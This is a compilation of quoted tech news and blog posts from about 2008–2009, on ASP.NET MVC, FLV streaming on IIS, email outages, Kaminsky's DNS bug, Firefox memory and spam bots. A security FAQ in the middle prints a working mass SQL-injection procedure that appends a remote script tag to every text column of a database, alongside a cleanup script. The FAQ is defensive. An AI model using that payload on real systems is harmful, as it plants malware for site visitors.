As part of Scott Guthrie's keynote March 18th at Mix 2009, Microsoft announced the final release of ASP.NET Model View Controller (MVC). If you haven't had a chance to look at it yet, now is your chance as it's officially out of beta and into full production.

ASP.NET MVC—Why All the Hype?

In case you haven't heard, Microsoft has made it abundantly clear that ASP.NET MVC isn't designed to replace ASP.NET Webforms development. Instead, it's another option that Microsoft is making available to developers. This is similar to Microsoft's decision to allow developers to code in both Visual Basic and C# - the idea being that developers chose what best meets their needs and particular styles.

Personally, I'll never go back to WebForms, because I'm sold on the way MVC solutions give me complete control over my markup, facilitate testing, and allow greater control over URL routing while making my code much more modular (which in turn, makes it easier to manage and extend). So, while MVC development might not be for everyone, it's definitely for me, and I'm completely sold on it.

ASP. NET MVC as a Testament to Innovation at Microsoft

But what I really love the most about ASP.NET MVC (in addition to all of the time it saves me as a developer), is that it's a perfect example of some very new, and innovative, approaches that Microsoft has taken in regards to addressing business and the web in general. Once upon a time, Microsoft's approach to the web and competing products and platforms basically consisted of doing nothing more than pretending that those offerings didn't exist. You can see some examples of this mindset by visiting some parts of the Microsoft corporate site, where many pages and applications simply don't work correctly with browers other than Internet Explorer. Likewise, this mindset was also at the heart (in my opinion) of much of the complaints leveled at Microsoft for being nonconformant with industry accepted standards.

But the MVC is part of a vanguard of new products and services delivered by Microsoft  where the company seems to take an entirely different approach. Rather than simply pretending that other offerings don't exist, this approach focuses on accepting the strengths of other platforms, analyzing those strengths, rolling them into Microsoft products where applicable, and then building supporting and competing Microsoft products that developers, and IT professionals, just can't do without.

IIS 7, for example, no longer pretends that PHP doesn't exist. Instead, it fully embraces it, and is striving to provide such a powerful hosting platform for it that businesses will choose to run PHP on IIS7 given the ease of management, extensibility, and flexibility that they'll enjoy from hosting PHP on a Windows Server. And if Microsoft is able to deliver? Then businesses will be buying Windows Server licenses for their web workloads, instead of using Apache licenses. It's a bold business approach to be sure, but I much prefer this approach to meeting the competition head-on, rather than watching Microsoft merely burying its head in the sand.

What's better though, is that it appears that as Microsoft continues to take this head-on business approach, we're finally starting to see some really innovative things coming out of Redmond. And in my mind, a prime example of that innovation has been the effort and energy devoted to the creation of ASP.NET MVC functionality. As an ASPInsider, I've been able to see just how innovative the ASP.NET team working on this project has been - and how careful they've been in creating this platform in order to ensure that it really, and truly, met real-world business needs.

A further example of how this innovation and its associated paradigm shift is taking root at Microsoft is the BizSpark program, which takes a very aggressive approach at preventing start-ups from courting the LAMP stack as a cheaper alternative to the Microsoft Stack by giving them three years to use Microsoft products and licenses for free.

And, if you think that I've possibly gone off the deep-end, or imbibed a bit too much of the Microsoft Kool-Aid, make sure to check out Bill Buxton and Scott Guthrie's Keynote from Mix '09. Here’s the link: http://live.visitmix.com/. You’ll need to mouse over the player, select the Other Videos option, and select the Day1 Keynote.

Unless there's something seriously wrong with you, this keynote will get you excited about development again, and it will totally make you rethink your relationship with Microsoft. You'll also see some great examples of real-life innovation.

Getting Started with ASP.NET MVC

As for ASP.NET MVC itself, if you've been waiting for it to mature a bit before playing with it (or just haven't had the time yet), now is a great time to pull it down and try it out. It now has a brand new portal page on the www.asp.net web site itself, and there are also a number of great videos that will help you get quickly spun up on how it works, and what it does. In fact, if you'd like a very quick overview of how MVC applications work, make sure to check out Stephen Walther's new video that shows a start-to-finish MVC app.

Likewise, one of the great things about MVC development is that it's insanely extensible and lends itself very well to customizations and tweaks. I've leveraged these capabilities extensively in my own projects, and a huge resource that's helped me in doing so has been access to the actual source code for ASP.NET MVC itself - which you can peruse (or even download) from the codeplex site.

Another resource that you'll want to pay attention to if you're interested in MVC development is MVCContrib, which is an extensive suite of open-source extensions and augmentations that can be used to improve MVC development. I've also found that Phil Haack’s and Rob Conery's blogs are great resources; they document some MVC features and functionality. But more importantly, these blogs are great resources in terms of explaining why certain features are implemented as they are. The resulting transparency from those blogs helps (in my mind) play a big part in much of the innovative spirit that makes MVC and other recent releases from Microsoft so exciting and refreshing.

Source: http://www.devproconnections.com/

This tutorial is about how to configure your web server to stream your own movies on your web page just like video.google.com does.

Requirements:

• Windows Server 2003
• IIS 5.0/6.0
• ffmpeg.exe (from http://ffmpeg.mplayerhq.hu or download latest beta version here)
• flvtool2 (from http://inlet-media.de/flvtool2)
• a GUI for ffmpeg (if you don't want to use the console, e.g. Avanti http://avanti.arrozcru.com)
• a FLV Streaming Player (e.g. FLV-Scrubber 3.0 by Fabian Topfstedt: http://topfstedt.de/FLVScrubber3/FLVScrubber.swf)
• a FLV Player (e.g. http://flv-player.softonic.de)
  

1. Configuring Windows Server 2003 and IIS

Add a new web site in your IIS and don't forget to select "Run Scripts (such as ASP)".

Using this HTTP handler you can easily FLV streaming downloads just like . All you need is to install on your IIS 5.0/6.0 the following HTTP handler and to get this to work correctly, you will need to make sure that IIS handles request for .flv files. In your site's properties, click the "Home directory tab" and click the "Configuration" button. You'll get a form like this:

Add the entry for .flv, click edit, and copy the path in the executable field. This is the aspnet_isapi.dll for the current version of the .NET Framework of your virtual site. Cancel out of that dialog and click "add." Paste the path into the executable, use the extension .flv and set your verbs limited to "GET, POST, HEAD, DEBUG" like this:

Now any request for a .flv file on the site will be handled by ASP.NET. Since the server-wide machine.config file doesn't specify what class should handle the request, a default handler is used unless we add the following lines to the web.config file (of your web site):

2. Coding

Web.config

<httpHandlers>
verb="*" path="*.flv" type="FLVStreaming" />
</httpHandlers>

FLVStreaming.cs

using System;
using System.IO;
using System.Web;
public class FLVStreaming : IHttpHandler
{

    // FLV header
private static readonly byte[] _flvheader = HexToByte("464C5601010000000900000009");

public FLVStreaming()
    {
    }
public void ProcessRequest(HttpContext context)
    {
try
{
int pos;
int length;
// Check start parameter if present
string filename = Path.GetFileName(context.Request.FilePath);
using (FileStream fs = new FileStream(context.Server.MapPath(filename), FileMode.Open, FileAccess.Read, FileShare.Read))
            {
string qs = context.Request.Params["start"];
if (string.IsNullOrEmpty(qs))
                {
                    pos = 0;
                    length = Convert.ToInt32(fs.Length);
                }
else
{
                    pos = Convert.ToInt32(qs);
                    length = Convert.ToInt32(fs.Length - pos) + _flvheader.Length;
                }
// Add HTTP header stuff: cache, content type and length       
context.Response.Cache.SetCacheability(HttpCacheability.Public);
                context.Response.Cache.SetLastModified(DateTime.Now);
                context.Response.AppendHeader("Content-Type", "video/x-flv");
                context.Response.AppendHeader("Content-Length", length.ToString());
// Append FLV header when sending partial file
if (pos > 0)
                {
                    context.Response.OutputStream.Write(_flvheader, 0, _flvheader.Length);
                    fs.Position = pos;
                }
// Read buffer and write stream to the response stream
const int buffersize = 16384;
byte[] buffer = new byte[buffersize];
int count = fs.Read(buffer, 0, buffersize);
while (count > 0)
                {
if (context.Response.IsClientConnected)
                    {
                        context.Response.OutputStream.Write(buffer, 0, count);
                        count = fs.Read(buffer, 0, buffersize);
                    }
else
{
                        count = -1;
                    }
                }
            }
        }
catch (Exception ex)
        {
            System.Diagnostics.Debug.WriteLine(ex.ToString());
        }
    }
public bool IsReusable
    {
get { return true; }
    }
private static byte[] HexToByte(string hexString)
    {
byte[] returnBytes = new byte[hexString.Length / 2];
for (int i = 0; i < returnBytes.Length; i++)
            returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16);
return returnBytes;
    }

}

All you need now to stream your favorite FLV movies is a custom-made player which is fetching the contents passing to the request the ?start= parameter in order to seek the current position inside the video file.

Fabian Topfstedt has one available onto his site (get the player and place it in your site document root).

To use Fabian player you have to embed the following HTML code inside your page (and of course you should change the path to you .flv video and player):

 <object id="FLVScrubber" width="450" height="253" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0"><param name="movie" value="http://topfstedt.de/FLVScrubber3/FLVScrubber.swf"/><param name="bgcolor" value="#000000"/><param name="allowScriptAccess" value="sameDomain"/><param name="allowFullScreen" value="true"/><param name="flashVars" value="file=http://www.nibbler.at/republicofideas.flv&previewImage=http://nibbler.at/republicofideas.jpg"/><embed src="http://www.topfstedt.de/FLVScrubber3/FLVScrubber.swf" bgcolor="#000000" width="450" height="253" name="FLVScrubber" allowScriptAccess="sameDomain" allowFullScreen="true" flashVars="file=http://www.nibbler.at/republicofideas.flv&previewImage=http://nibbler.at/republicofideas.jpg" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer"></object>

There are three attributes of interest: Width and height define the resolution of FLV-Scrubber. If your videos’ native resolution is eg. 320×240 pixels, you might want to set width to 320 and height to 240. No problem if does not match, the video just will be scaled up or down. The third attribute is “flashvars”. That’s where you change the bahaviour and pass over information to FLVScrubber. You need to set at least file here, to link to the video you want to play. Everything else is optional (key/value pairs inside the flashvar attribute are separated using &). Here is a complete list:

• file=[URL] defines which video to show
• &autoStart lets the video start immediately
• &bufferTime=[number] changes the buffer time (default is 3 seconds)
• &clickTag=[URL] defines a target to call after video ended
• &credit=[(URL encoded) text] to show a credit like your company name in the context menu
• &link=[URL] defines a website to open when user clicks into the video
• &linkTarget=[blank,parent,self,top] defines the target of the website above (default: blank)
• &loop=true lets your video replay itself instead of ending (default: false)
• &previewImage=[URL] sets an backgroundimage as preview before playback starts
• &scrubbing=false use that, if you’re webserver has no enabled module for fake streaming (default: true)
• &seeking=false disallows the user to seek inside the video (default: true)
• &secondsToHide=[number] defines amount of seconds that the controlbar waits before hiding (0 means never, default is 5)
• &startAt=[number] defines the the second where the playback will start (default:0)

3. Converting your movie into FLV format

Now you need to convert/encode a video file (e.g. .avi) into a .flv by using ffmpeg and flvtool2 to index your in order to add the correct metadata inside the FLV file. You can do this by using the console (e.g):

ffmpege.exe -i test.avi test.flv
flvtool2.exe -U test.flv

or by using a GUI for ffmpeg like Avanti (http://avanti.arrozcru.com):

(don't forget to copy the ffmpeg.exe in your ../avanti/ffmpeg folder and load the "FLASH HQ" template from the Avanti menu). If you are a proud owner of Adobe Flash Professional 8 you can use the Flash 8 Video Encoder and you don't need ffmpeg and flvtool2 to encode and index your videos.

After encoding your video you can use a PLV Player (e.g. http://flv-player.softonic.de) to check if .flv file match your needs (e.g. correct resolution, bitrate...).

Now upload all file to your web server and your web site root should look like:

yourdirectory/App_Code/FLVStreaming.cs
yourdirectory/Web.Config
yourdirectory/default.htm
yourdirectory/FLVScrubber.swf
yourdirectory/yourmovie.flv

[QUOTE]
According to Commtouch Software, an average of about 10 million zombie computers worldwide are sending an average of 3 million messages every day. Some time periods indicate a collective peak spam output of 8 million to 10 million messages.

Many of those messages are sent through the top three web-based mail services. Gmail, operated by Google, ranks #3 among the top 10 origins for spam. Yahoo ranks #6, and Hotmail, operated by Microsoft, ranks #7. It's probably not coincidental that the rankings correspond to the popularity of each company's search engines and other online services.

The current top 2 offending domains origins are nearly unheard of by the majority of Internet users. Active-encounter.com, operated by marketing company iLead Media, ranks #1 and authentic-mechanic.com, registered to Tad Asaro, ranks #2. Asaro is registrant of the relatively new BabytoBee.com site.

Commtouch's cost calculator currently indicates that a company with 50 employees, each with an average salary of $50,000 per year, who also receive 25 messages per day - half of which are spam - would spent $14,300 per year as a direct result of dealing with spam.
[/QUOTE]

Source: windowsitpro.com

[QUOTE]
Apple's MobileMe and Google's Gmail online e-mail services suffered hours-long outages Monday, leaving millions of users unable to access their accounts.

Google restored service within about two and a half hours, but it took Apple approximately seven hours to restore full access to its online mail service.

Apple users first reported trouble accessing the service's servers from their desktop mail clients around 2 p.m. Eastern, and in the next several hours, posted several hundred messages on the MobileMe support forum about the outage.

A notice on the service's main support page acknowledged the problem. "MobileMe members are intermittently unable to access MobileMe Mail using a desktop e-mail application, iPhone or iPod touch," said Apple. "Access to www.me.com/mail is unaffected. Service will be restored ASAP. We apologize for any inconvenience."

By 9 p.m. Eastern that notice had been replaced with an all-clear indicator.

Google's Gmail, meanwhile, went offline around 5 p.m. Eastern, and greeted users with a message reading in part, "We're sorry, but your Gmail account is currently experiencing errors."

A little over two hours later, Google added a notice to its Gmail help page that attributed the outage to "the contacts system used by Gmail which is preventing Gmail from loading properly. We are starting to roll out a fix now and hope to have the problem resolved as quickly as possible."

Shortly after that, at about 7:30 p.m., Google declared the outage over. "Users who were temporarily affected by the 502 errors should now be able to access their account," read a message posted to the Gmail Help Discussion forum. "Thanks for your patience while we worked to resolve this issue for everyone."

Apple users were especially livid, in part because they, unlike Gmail's users, pay for their service, and also because of the multiple problems they had with MobileMe since its launch a month ago.

"I'm so disgusted with Apple right now I don't even know what to say," said a user identified as "Furi0us.Bee" in a message posted to the longest forum thread on the subject.

"This is crazy," said another user, "mac_wa," on the same thread. "I have had more down time with my mac/me mail than any other service I've had... and I pay for this."

But Owen Schultz had one of the best takes of any user. "Dear MS Outlook," Schultz started, "I am so sorry about our breakup several year ago. I have been thinking about you a lot since then. Will you please consider taking me back? Just one more chance? I'm sorry about all the horrible things I said about you and your operating system. You were the best I ever had! MobileMe and I are finished!"

MobileMe's travails -- ranging from an extended migration from its predecessor, .Mac, to an 11-day mail outage last month -- prompted Apple's CEO, Steve Jobs, to issue a memo to company employees last week in which he called the rollout "not up to Apple's standards."

Jobs shook up Apple's management team over the series of snafus, and handed responsibility for the service to Eddy Cue, who heads iTunes.
[/QUOTE]

Source: www.infoworld.com

[QUTOE]

Las Vegas (NV) – The Internet relies on trust, but what if all that trust comes tumbling down?  That’s exactly the problem noted security researcher Dan Kaminsky described today in his Black Hat talk about DNS cache poisoning.  Several months ago, Kaminsky discovered a vulnerability in the DNS protoctol that allowed bogus name information to be sent to other servers and desktop computers – in essence hackers could redirect web surfers, chat clients and even email servers to machines of their choosing.  Specific details about the vulnerability and the ways to exploit it have been kept secret until today …

Kaminsky is the director of penetration testing for IOActive and specializes in playing around with DNS.  He says he found the vulnerability by accident while he was poking around for other “toys”. To fully understand the bug, let’s go into a brief introduction into how DNS or domain name service works.  Network gurus can probably skip the next few paragraphs.

Almost every Internet service you use, from email to web browsing uses DNS convert the easily remembered names like www.google.com, www.youtube.com and others into IP address like 123.456.789.123.  This conversion is needed because people can remember names easier.  Also companies can change names while keeping all their services pointed to the same numerical IP address.
Behind the scenes, DNS servers make this magic happen by holding a database of DNS records which are lists of names with corresponding IP addresses – think of it as a big list of example.com = 123.456.789.123, example2.com = XXX.XXX.XXX.XXX, etc.  Client computers ask for an IP address by sending a DNS request to the server and the server will reply back with the answer.  Of course servers can only hold so much information, and will hand off the request to a more authoritative server, if it doesn’t know the answer.  The requests can be further bounced up the chain until they reach the ultimate or root domain name servers for the Internet.  If these guys don’t know the answer, then the name to IP address mapping doesn’t exist.
Now imagine yourself as a 411 operator who has to find telephone numbers when asked about a certain place - let’s say Outback Steak House in Torrance, California (our favorite place in the world).  On the first call, you’d probably type it into your computer and wait for the answer, but let’s say the place is really popular and you get tons of calls every day for the place.  Eventually, a smart operator would write the number on a Sticky-Note and post it on the monitor for quick retrieval.  Then when a person calls, you simply read the number on the note, rather than taking the time to type it into the computer.  Well this is exactly what DNS servers do in form of cache.
Kaminksy’s DNS bug, as some people are calling it, exploits this cache by sending malicious requests and once a sufficient number of requests have been sent, the hacker can start rewriting the entries.  It’s important to distinguish that the actual records of the DNS server is not corrupted by this bug, rather it’s the entries in the cache itself.
Kaminsky sat down with us afterwards to give us all the gory details that would make the average man’s head explode, but hey that’s why you come to TG Daily isn’t it.  His attack forces your local domain name server (which is probably your Internet router) to basically perform all the work.  The bad guy forces the DNS server to purposely miss the cache by asking for the IP address of crazy domain names like 1.foo.com, 2.foo.com, 3.foo.com.  Your local domain name server won’t know the details so it then asks other servers to obtain the answer.
As requests and replies flow out and back to your local server, the attacker then unleashes a torrent of specially crafted packets to the victim domain name server.  These packets try to guess the transaction ID of the DNS reply which is a number that ranges from 1 to 65536.  The attacker also has to forward the packet to the correct port which in most cases is the default DNS port 53.
The attack is basically a race of a the hacker stream of DNS replies versus the real reply coming from the real DNS server.  Once the victim DNS server receives a reply with a valid transaction ID, the attacker can substitute any IP address for the domain name.  “The hacker’s packet blows away the response from the real server,” Kaminsky told TG Daily.

Kaminsky was kind enough to draw out the attack for us.  The client computer is on the left and the first node to the right is your local domain name server.

Ok, so I’m sure some of you see two big problems with this.  First, how the heck do you guess the correct transaction ID out of more than 65000 numbers and how do you get the local domain name server to issue the query that starts the whole ball rolling?  Kaminsky says most DNS servers simply increment their transaction ids which makes guessing them fairly trivial.  Also some implementations of DNS are run on a buggy random number generator that produces predictable patterns of numbers.  As far as getting the domain name server to issue the query, Kaminsky told use there are at least eight ways that he knows of and probably tons more that he doesn’t.  “Sometimes you can just ask and the server will issue a query, but it’s amazingly easy to get a DNS server to look something up,” he said.

So what does a hacker gain from attacking DNS servers?  According to Kaminsky, owning the .COM dns space would get you pretty much anything you wanted.  Everything from intercepting emails to taking over spam filters could be accomplished.  He even outlined grabbing passwords to webmail and other services by exploiting the “Forgot Your Password” feature used by many vendors.  But perhaps the biggest risk was to SSL security because certificate vendors could be duped into giving certs to bogus companies.

SSL certificate authorities issue the certificates by identifying the applicant through email.  The vendor looks up the domain’s address in WHOIS and then sends an email to the mail address contained in the record.  But if you were able to poison the DNS to redirect Microsoft’s DNS entry, then you could conceivably gain a Microsoft or another large company’s certificate.
Kaminsky found the bug approximately five months ago and initially worked solely with vendors to patch the bug because he feared any leak would invite malicious hackers into taking over the Internet.  “I spent the last few months terrified that companies would have their emails stolen because of a bug I found,” he told us. 
Kaminsky was lambasted by some security researchers because hackers, by their very nature, are quite the peer oriented group.  Those critics were eventually silenced after Kaminsky had a conference call with the doubters.
In a press conference after the talk, Kaminsky told reporters that vendors have been “fantastic” in responding and patching the bug.  Microsoft even hosted a summit on March 31st where Kaminsky and fellow researchers flew to Redmond Washington in a marathon session to hammer out a fix – something that took thousands of man hours and “thousands of pizzas”.
That patch, dubbed the “sledgehammer fix” by Kaminsky, randomized the transaction IDs and upped the range to more than a 100,000,000 possibilities.  Hopefully a competent IT administrator would notice hundreds of millions of malicious packets hitting their DNS servers, Kaminsky said.
On July 8th, most of the major vendors like Microsoft, Sun, Cisco and Red Hat had patched their servers and Kaminksy has stayed in constant contact with major web companies like MySpace, Craigslist and eBay, all in the hopes of educating IT administrators of the problem.  “I’ve been on the phone a lot, a whole lot,” he said, adding that he doesn’t want to look at his mobile phone bill for the last month.
But Kaminsky warns that the danger isn’t completely over and that the next bug may not come with as much warning and the hacker finding it may not be as considerate.  “They probably won’t be as friendly as me,” he said.
[/QUOTE]

Source: www.tgdaily.com

[QUOTE]
One of the biggest “improvements” that Mozilla claims has made its way into Firefox 3 is improved memory usage, in particular, the vanquishing of memory leaks:

"Memory usage: Several new technologies work together to reduce the amount of memory used by Firefox 3 over a web browsing session. Memory cycles are broken and collected by an automated cycle collector, a new memory allocator reduces fragmentation, hundreds of leaks have been fixed, and caching strategies have been tuned."

We’re sorry to have to break it to you, but if you thought it was too good to be true you were right. Firefox still uses a lot of memory – way too much memory for a web browser.

We haven’t seen it reach 1GiB+ like we have with previous versions, but it’s quite normal for Firefox 3 to be sucking up ~300MiB of memory right off the bat, without a memory leak (the difference between memory leaks and normal memory abusage is that in a memory leak you’ll see the memory usage keep increasing the longer the browser is open/in-use).

This is a screenshot of Firefox’s memory usage after just a half hour or so with only a couple of HTML-only tabs open. This particular screenshot was taken on Linux where Firefox is using the shared GTK libraries – on our Windows PCs, it’s normal to find Firefox 3 taking up ~350MiB or so on both XP and Vista.

The sad thing is that isn’t caused by one of the memory leaks that plagued previous versions of Firefox. It’s Firefox 3 is supposed to take up that much memory – at least, that’s our assumption given how we’ve never seen it take up less.

Firefox 3 has a number of memory-hogging features added to the mix that are probably at least partially responsible for the absolutely gargantuan memory footprint. For example, Firefox now uses an SQL engine to keep track of your history and bookmarks, amongst other things. While that particular feature is powered by SQL-lite, which should – in theory – not take up too much memory, we’re at a loss to explain what else is wasting memory left, right, and center in the world’s most-popular open source web browser.

Things like full-text on-the-fly searching of the web cache for when you type text in the address bar certainly have an impact as well – that’s a lot of stuff to keep in memory at one time. But Opera 9.5 does the same with a lot less memory, so obviously Firefox 3 is doing something wrong.

It’s a shame that Firefox 3 is on the verge of a release and is so terribly unfit to run on any machine – Windows, Linux, or OS X – with less than at least a couple of gigabytes of memory.
[/QUOTE]

Source: http://neosmart.net/

[QUOTE]
Reports about the massive infection of web sites by an automated tool, whose most recent prominent victims have been United Nations, UK Government and the U.S. Department of Homeland Security raised some recurring questions which are worth answering.

1. The attack is targeting Microsoft IIS web servers. Is there a Microsoft vulnerability?
2. What can I do if I’m the administrator of an infected site?
3. What should I do as an user to protect myself?
4. How can NoScript protect if the compromised sites are in my trusted whitelist?

 

“Exploits of a Mom” by xkcd

1. The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?

   Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
   That said, the attackers are targeting IIS web servers which run ASP for a reason.
   Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This is the “secret sauce” which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology — but it’s a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful” DB technology of being used in conjunction with web servers different than IIS are very low.
   So, to recap:

   1. There’s no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well.
   2. SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
   3. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.

   In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didn’t really grow enough security awareness to develop safe internet-facing applications.

2. What should I do if I’m the administrator of an infected site?

   First of all, you should call your web developers (or even better, someone who specializes in web application security) and require a full code review to find and fix the SQL injection bugs.
   In the meanwhile you should either put your database offline or recover clean data from a backup, but until the code review is done be prepared to get compromised again. Deploying a web application firewall may mitigate the emergency, but you must understood it’s a merely temporary work-around — the solution is fixing the code (learn from the United Nations tale).
   If you’ve got no clean database backup, you could try to recover by brutally reversing the SQL attack:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This SQL procedure walks through your tables and fields, just like its evil prototype, but rather than appending the malicious JavaScript with
   
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')

   it locates and removes it with
   
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')

   Notice that I’ve not tested my code above, and I’m just providing it as a courtesy: use it at your own risk, after doing a backup of your data.

3. What should I do as an user to protect myself?

   OK, this one is the easiest :)

4. How can NoScript protect if the compromised sites are in my trusted whitelist?

   Even if the compromised site is in your whitelist, allowed to run JavaScript, the malicious scripts are hosted on external servers controlled by the attackers (e.g. www.nihaorr1.com): therefore NoScript prevents them from being loaded and effectively defeats the attack.

[/QUOTE]

Source: http://hackademix.net/2008/04/26/mass-attack-faq/

[QUOTE]
Websense Security Labs ThreatSeeker™ technology has discovered that spammers in their recent tactics have drawn their attention towards traditional and infamous Hotmail, aka Live Hotmail services after the streamlined Live Mail Anti-CAPTCHA operations. Spammers have managed to create automated bots that are capable of not only signing up and creating random Hotmail accounts, but also use these accounts for spamming purposes from a proper Live Hotmail service. Websense predictions about this sophisticated spammer strategy at the time of Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations, and its outcomes have been factual with this attack.

Websense believes that there are four main advantages to spammers from this approach. First, the Microsoft domain is unlikely to be blacklisted. Second, they are free to sign up. Third, the integration of Hotmail with wide range of Windows Live services. And fourth, it may be hard to keep track of them as there are millions of users worldwide using the service.
Let’s see the entire automated process in two stages.

Stage 1: Signing up and creating accounts successfully.
Part 1: Observe the bot hooking itself on to Internet Explorer browser on victims’ machine.

Part 2: Observe the set of pre-determined account names injected on to victims’ machine which bot attempts to sign-up over victims’ machine.

Part 3: The bot uses Internet Explorer browser in the background on the victims’ machine for attempting Hotmail account sign-up process.

Part 4: Observe the bot visiting Microsoft Hotmail account sign-up page, trying to grab CAPTCHA, and sending it to CAPTCHA breaking host for account creation.

Part 5: Try-break, try-break, try-break.

Part 6: Observe CAPTCHA images being collected as hidden files from victim’s machine during different account sign-up attempts.

Part 7: Unlike, Live Mail CAPTCHA break process, in this attack, the CAPTCHA breaking host communication with the victims’ machine is scrambled. It is observed that 8 characters in the CAPTCHA code are returned instantly during the sign-up, after the CAPTCHA image is sent to the breaking host. The bot infected or victims’ machine descrambles it to signup the account successfully.

Part 8: Observe that account is being signed up and created successfully.

Part 9: The created account credentials are returned back to CAPTCHA breaking host.

The entire process is automated and carried out in iterative manner until all the accounts are successfully signed up in the list injected (initially) on to victims’ machine (refer to Stage 1, Figure 1.2).
Stage 2: Spamming using created accounts from a proper Hotmail Server
Once all the accounts in the list (refer to Stage 1, Figure 1.2) are signed up by the bot, they are then picked randomly and used for spamming purposes.
Part 1: Observe the login process in action.

Part 2: Login process in further progress.

Part 3: Proper login in progress over SSL page.

Part 4: Observe the bot attempted a successful login on to a proper Live Hotmail Server page.

Part 5: Observe the bot attempting to initiate the edit process or composing a message for spamming.

Part 6: Spam message build in progress by the bot.

Part 7: Bot successfully filling in the "from email address list", “to email address“ lists , email subject, and the body to be included in the message for spamming purposes, there by competing its task.

End of message! Spam is being sent to targeted accounts.
Part 8: Finally the account is logged out to continue it similar operation with next email account.

Part 9:The entire process in action that is carried out in iterative manner to perform mass-mailing from different accounts created by the bot.

Spammers finally have success advertising their product.

Observations:
Stage 1: One in every 8 to 10 attempts to signup a hotmail account are successful. Hence success rate approximately ranges between 10 to 15%.
Stage 2: Spam campagins from one Hotmail account is sent to multiple accounts in CC and BCC list at a time. The same Hotmail account (or “from account/ address”) is not repeatedly used for sending spam campaigns continuously. They are changed in timely fashion by the bot. The same is the case with targeted accounts (or “to account(s)/ addresses) for spamming.
Additional Information:
It is observed that unlike Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations in the past, the current attack is aggressive and instantaneous in terms of CAPTCHA breaking host turn-around time.
In the current attack, the response time of CAPTCHA breaking host after grabbing a CAPTCHA image from a victims’ machine, analyzing it, and responding back to victims’ machine with corresponding CAPTCHA code is relatively lower when compared to previous attacks.
Note 1: It is observed that the total response time for CAPTCHA breaking on the average is only about 6 seconds*.

Note 2: The timing on the request/response in this current attack clearly indicates the possibility of an automated system at the spammers’ end performing the Anti-CAPTCHA operation.
Websense believes that these accounts could be used by the spammers at any time for a variety of social-engineering attacks in future. A wide range of attacks (both manual and automated) would be possible using the same account credentials on other significant Live services integrated with Live Hotmail services offered by Microsoft Corporation, such as Live Messenger (instant messaging), Live Spaces (online storage), etc.

Note: For more information on Hotmail aka Live Hotmail and Live services, see the Hotmail, Live Hotmail and Live Mail entries on Wikipedia.
[/QUOTE]

Source: http://securitylabs.websense.com/

[QUOTE]
[...]
"It's about time. Great for Microsoft. Great for Yahoo shareholders. These Internet markets are winner-take-all markets and they cannot be built. Time is too valuable. Yahoo has one of the best positions on the Internet because it's integrated brand (advertising) with search.
[...]
"They have to do it because they've tried everything they can do to fix MSN. Yahoo is the most visited site in the world, so it goes without saying that given the current valuation, this is the perfect time for them to buy it. "Google is running away with the search market and that's obviously the best part of the market. The likelihood that Google gets caught is slim to none. "You might not catch Google, but you can still be a legitimate player."
[...]
"We think it is great for Yahoo shareholders. This consolidates the marketplace down to Google versus Microsoft. Their multiple areas overlap -- not just search but also applications. Google's been pushing hard into the application space. "Yahoo mail continues to be much slower than the Gmail product. Yahoo search continues to lose share to Google. Asked whether Google might counterbid for Yahoo he said, "There is really nothing there that Google wants that they (Google) don't have."
[...]
"Microsoft has been getting more aggressive with acquisitions. We've seen them start to step up and buy large public players. Strategically, it makes sense. "It's a fair price. Clearly Yahoo shares have been under pressure. Microsoft wants to get it done, and get it done quickly. Trying to offer them a 10 percent premium would be kind of foolish. You'd create a problem, you'd let other bidders get into the fray.
[...]
[/QUOTE]

More on: http://www.reuters.com/

[QUOTE]
The openness of the Internet is what made Google -- and Yahoo! -- possible. A good idea that users find useful spreads quickly. Businesses can be created around the idea. Users benefit from constant innovation. It's what makes the Internet such an exciting place.

So Microsoft's hostile bid for Yahoo! raises troubling questions. This is about more than simply a financial transaction, one company taking over another. It's about preserving the underlying principles of the Internet: openness and innovation.

